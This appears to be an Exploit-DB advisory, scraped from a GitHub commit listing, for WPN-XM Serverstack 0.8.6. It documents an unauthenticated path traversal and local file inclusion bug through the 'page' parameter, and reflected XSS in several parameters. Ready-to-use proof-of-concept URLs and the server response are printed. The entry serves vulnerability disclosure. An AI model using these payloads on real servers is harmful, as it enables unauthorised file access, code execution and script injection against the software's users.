
36 changes to exploits/shellcodes/ghdb MiniDVBLinux 5.4 - Change Root Password MiniDVBLinux 5.4 - Remote Root Command Injection MiniDVBLinux 5.4 - Arbitrary File Read MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) MiniDVBLinux <=5.4 - Config Download Exploit Desktop Central 9.1.0 - Multiple Vulnerabilities FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass Aero CMS v0.0.1 - PHP Code Injection (auth) Aero CMS v0.0.1 - SQL Injection (no auth) Atom CMS v2.0 - SQL Injection (no auth) Canteen-Management v1.0 - SQL Injection Canteen-Management v1.0 - XSS-Reflected Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS) Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) WebTareas 2.4 - RCE (Authorized) WebTareas 2.4 - Reflected XSS (Unauthorised) WebTareas 2.4 - SQL Injection (Unauthorised) WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass Grafana <=6.2.4 - HTML Injection Hex Workshop v6.7 - Buffer overflow DoS Scdbg 1.0 - Buffer overflow DoS Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) AVS Audio Converter 10.3 - Stack Overflow (SEH) Explorer32++ v1.3.5.531 - Buffer overflow Frhed (Free hex editor) v1.6.0 - Buffer overflow Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path Resource Hacker v3.6.0.92 - Buffer overflow Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
75 lines
No EOL
2.5 KiB
Text
75 lines
No EOL
2.5 KiB
Text
# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
|
|
# Discovery by: Rafael Pedrero
|
|
# Discovery Date: 2022-02-13
|
|
# Vendor Homepage: http://wpn-xm.org/
|
|
# Software Link : https://github.com/WPN-XM/WPN-XM/
|
|
# Tested Version: 0.8.6
|
|
# Tested on: Windows 10 using XAMPP
|
|
|
|
# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
|
|
(path traversal)
|
|
|
|
CVSS v3: 7.5
|
|
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
CWE: CWE-829, CWE-22
|
|
|
|
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
|
|
unauthenticated directory traversal and Local File Inclusion through the
|
|
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
|
|
(without php) GET request.
|
|
|
|
Proof of concept:
|
|
|
|
To detect: http://localhost/tools/webinterface/index.php?page=)
|
|
|
|
The parameter "page" can be modified and load a php file in the server.
|
|
|
|
Example, In C:\:hello.php with this content:
|
|
|
|
C:\>type hello.php
|
|
<?php
|
|
echo "HELLO FROM C:\\hello.php";
|
|
?>
|
|
|
|
|
|
To Get hello.php in c:\ :
|
|
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello
|
|
|
|
Note: hello without ".php".
|
|
|
|
And you can see the PHP message into the browser at the start.
|
|
|
|
Response:
|
|
|
|
HELLO FROM C:\hello.php<!DOCTYPE html>
|
|
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
|
|
<head>
|
|
<meta charset="utf-8" />
|
|
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
|
|
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
|
|
<title>WP?-XM Server Stack for Windows - 0.8.6</title>
|
|
<meta name="description" content="WP?-XM Server Stack for Windows -
|
|
Webinterface.">
|
|
<meta name="author" content="Jens-André Koch" />
|
|
<link rel="shortcut icon" href="favicon.ico" />
|
|
|
|
|
|
|
|
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
|
|
|
|
CVSS v3: 6.5
|
|
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
CWE: CWE-79
|
|
|
|
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
|
|
sufficiently encode user-controlled inputs, resulting in a reflected
|
|
Cross-Site Scripting (XSS) vulnerability via the
|
|
/tools/webinterface/index.php, in multiple parameters.
|
|
|
|
Proof of concept:
|
|
|
|
http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
|
|
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
|
|
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E |